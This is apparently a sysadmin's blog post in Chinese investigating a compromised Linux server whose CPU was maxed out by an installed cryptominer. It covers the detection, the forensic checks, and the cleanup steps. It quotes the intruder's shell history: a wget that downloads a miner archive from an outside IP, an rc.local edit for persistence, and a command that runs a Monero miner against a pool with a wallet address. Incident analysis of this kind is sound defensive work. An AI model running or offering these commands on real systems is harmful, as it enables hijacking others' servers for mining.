早上到公司发现zabbix有一个报警:一台服务器的CPU使用率达到100%! 1.立即登录该服务器查看CPU top10
代码语言:javascript复制ps aux | head -1; | ps aux | grep -v PID | sort -rn -k 4 |head
发现 有一个yam开头的进程CPU已经占用120%,(此处无截图) 经确认,并非业务上的应用,凭经验分析,可以断定是被入侵了。
2.find找一下本地有没有yam相关的目录
代码语言:javascript复制find / -name yam
已经查到了(下图),就在root家目录下,有压缩包,还有解压的目录,痕迹也太明显了吧! 打开看一下里面的内容发现是一个挖矿机。
3.查看下登录日志
代码语言:javascript复制last
这三个IP是美国的,不知道是不是代理,然后看一下登录进来都做什么操作了:
代码语言:javascript复制history
贴出关键部分
代码语言:javascript复制884 wget http://210.245.92.160:9090/miner.tgz
885 vi /etc/rc.d/rc.local
886 tar zxvf miner.tgz
887 cd yam-yvg1900-M7v-linux64-generic
888 cd linux64-generic
889 nohup ./yam -c 1 -M stratum tcp://48zmbpHJyke7y9uewNAS7miDMqQcz8RH7BTqKaYFtVWx2UJ7mzLqVd8KWjeW1Bu5jr2zcUZqTHzYofn3kT76PsndSb5h3M3:x@erebor.dwarfpool.com:8005:8050:8080:8100/xmr
很明显,下载了这个包,解压运行了,还加了开机启动,不过竟然没有清除痕迹就走了。
4.看一下他get的这个网站
好吧,自己做的一个页面方便别人下载矿机用的。 在里面的文件发现软件的作者
5.清理工作 kill 掉进程 删除root家目录的包 删除/etc/rc.d/rc.local中的开机启动项 更改root密码
先做这么多,大家还有什么好的建议请多指教。